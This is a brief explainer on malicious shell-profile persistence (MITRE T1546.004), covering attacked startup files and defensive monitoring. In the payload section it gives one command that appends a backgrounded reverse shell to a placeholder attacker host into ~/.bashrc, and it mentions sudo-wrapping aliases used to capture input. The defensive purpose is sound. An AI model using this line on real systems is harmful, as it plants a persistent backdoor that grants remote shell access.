A malicious shell profile is persistence that adds attacker commands to a shell startup file, ~/.bashrc, ~/.bash_profile, ~/.profile, ~/.zshrc, or system-wide /etc/profile and /etc/profile.d/, so the payload runs every time a shell starts. It triggers on normal user activity (opening a terminal, an SSH login), needs only write access to the file (no root for user files), and hides among ordinary configuration. It maps to MITRE T1546.004.
What it is
When a shell starts, it executes its startup files to set up the environment: ~/.bashrc and ~/.bash_profile for Bash, ~/.zshrc for Zsh, plus system-wide /etc/profile and the /etc/profile.d/ scripts.
A malicious shell profile is the attacker adding a line to one of these. Because the file runs every time a shell opens, their command executes on the user’s normal activity, no special trigger required.
The technique and payload
The attacker appends to a startup file:
- User-level (no root):
echo 'bash -c "bash -i >& /dev/tcp/ATTACKER/443 0>&1" &' >> ~/.bashrcfires a backgrounded reverse shell each time the user opens a shell. - System-wide (root): drop a script in
/etc/profile.d/so it runs for every user’s login shell. - Subtler: define a malicious alias or function (for example wrapping
sudo) to capture input or run code.
It triggers on the next interactive shell or SSH login. Documented for defensive context.
How to defend
- Monitor shell startup files (user dotfiles and
/etc/profile,/etc/profile.d/,/etc/bash.bashrc) for changes via file integrity monitoring. - Baseline legitimate dotfiles and review them, especially on shared and service accounts.
- Alert on profile contents that spawn shells, make network connections, or define suspicious aliases/functions (like a
sudowrapper). - Limit root to protect the system-wide profile files.
- Audit new or recently modified dotfiles after suspected compromise.
References
- [1]MITRE ATT&CK: Event Triggered Execution (T1546)(MITRE)
- [2]Linux man-pages: bash startup files(man7.org)
- [3]MITRE ATT&CK: Persistence (TA0003)(MITRE)